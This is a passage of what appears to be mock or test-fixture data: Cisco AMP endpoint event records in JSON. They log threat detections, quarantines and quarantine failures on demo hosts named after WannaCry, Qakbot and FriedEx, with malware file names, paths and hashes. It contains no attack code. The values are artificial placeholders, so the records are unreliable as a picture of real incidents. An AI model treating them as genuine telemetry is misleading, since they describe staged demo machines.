Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
